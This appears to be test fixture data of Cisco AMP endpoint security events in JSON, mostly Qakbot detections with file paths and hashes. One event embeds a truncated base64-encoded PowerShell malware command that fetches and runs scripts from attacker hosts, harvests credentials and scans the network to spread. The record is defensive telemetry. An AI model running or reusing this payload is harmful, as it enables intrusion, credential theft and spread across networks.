+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0AD